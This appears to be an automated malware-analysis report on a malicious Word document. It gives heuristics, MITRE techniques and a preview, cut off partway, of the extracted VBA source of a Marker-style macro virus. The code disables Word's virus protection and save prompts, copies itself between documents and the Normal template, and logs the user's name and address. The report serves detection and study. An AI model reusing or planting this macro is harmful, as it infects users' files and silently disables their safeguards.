MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The script attempts to disable virus protection and save prompts, and searches for a marker string 'BLowMaster' within the document and normal template, suggesting an attempt to inject or modify VBA code. This indicates a likely attempt to establish persistence or further compromise the system via macro execution.
Heuristics 3
-
ClamAV: Doc.Trojan.Marker-38 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-38
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13726 bytes |
SHA-256: 7c0b997035b21c97dfa11068286ba3844f3832540b75a4827c63408bf2f5099f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): IT
End Sub
Private Function IT()
'Application.Options.ConfirmConversions = False: Application.EnableCancelKey = wdCancelDisabled
'FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable: FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
'CommandBars("Tools").Controls("Macro").Enabled = False
'If Application.Version = 9# Then: CommandBars("Macro").Controls("Security...").Enabled = 0
'If Application.Version = 8# Then
'With Application.Options: .VirusProtection = False: .SaveNormalPrompt = False: End With
'End If
newf
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End Function
Private Function newf()
Dim maker, Oldmaker
maker = "BLowMaster"
Options.SaveNormalPrompt = False
Dim SavDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Options.SaveNormalPrompt = False
Oldmaker = "-> this is another maker!"
Dim newd, nt As Object
Options.SaveNormalPrompt = False
Set newd = ActiveDocument.VBProject.VBComponents.Item(1)
Options.SaveNormalPrompt = False
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
Options.SaveNormalPrompt = False
DocumentInfected = newd.CodeModule.Find(maker, 1, 1, 10000, 10000)
Options.SaveNormalPrompt = False
NormalTemplateInfected = nt.CodeModule.Find(maker, 1, 1, 10000, 10000)
Options.SaveNormalPrompt = False
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
Options.SaveNormalPrompt = False
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
Options.SaveNormalPrompt = False
Mycode = newd.CodeModule.Lines(1, newd.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For I = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, I, 1) <> Chr(13) Then
If Mid(Application.UserAddress, I, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, I, 1)
Options.SaveNormalPrompt = False
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
Options.SaveNormalPrompt = False
End If
Next I
Mycode = Mycode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString Mycode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SavDocument = ActiveDocument.Saved
Options.SaveNormalPrompt = False
Mycode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
newd.CodeModule.DeleteLines 1, newd.CodeModule.CountOfLines
newd.CodeModule.AddFromString Mycode
If SavDocument = True Then ActiveDocument.Save
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.